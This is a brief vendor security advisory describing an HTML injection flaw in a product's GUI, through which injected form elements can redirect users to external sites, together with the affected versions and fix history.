EIQ-2018-0017#

ID

EIQ-2018-0017

CVE

-

Description

HTML injection through the GUI

Date

05 Jun 2019

Severity

2 - MEDIUM

CVSSv3 score

CVSSv3 score not available on NIST NVD.

Status

✅ 2.5.0

Assessment

Some manual input fields in the GUI parse HTML, instead of rendering it as raw source.

For example, this occurs in the Details input field in a workspace dashboard view, when users are in edit mode.

The code is sanitized to prevent cross-site scripting (XSS) injection attacks.

However, it is still possible to inject HTML containing redirects.

As a consequence, a form submission button can be injected with HTML containing redirects to external sites and resources.

Mitigation

-

Affected versions

2.3.0 to 2.4.0 included.

Notes

Former refs: 25750; 36511

This issue was closed as solved in release 2.4.0.

However, the problem persisted.

We reopened it with a planned solution available in release 2.5.0.

Note

The date in the Date field refers to the point in time when the issue was reopened.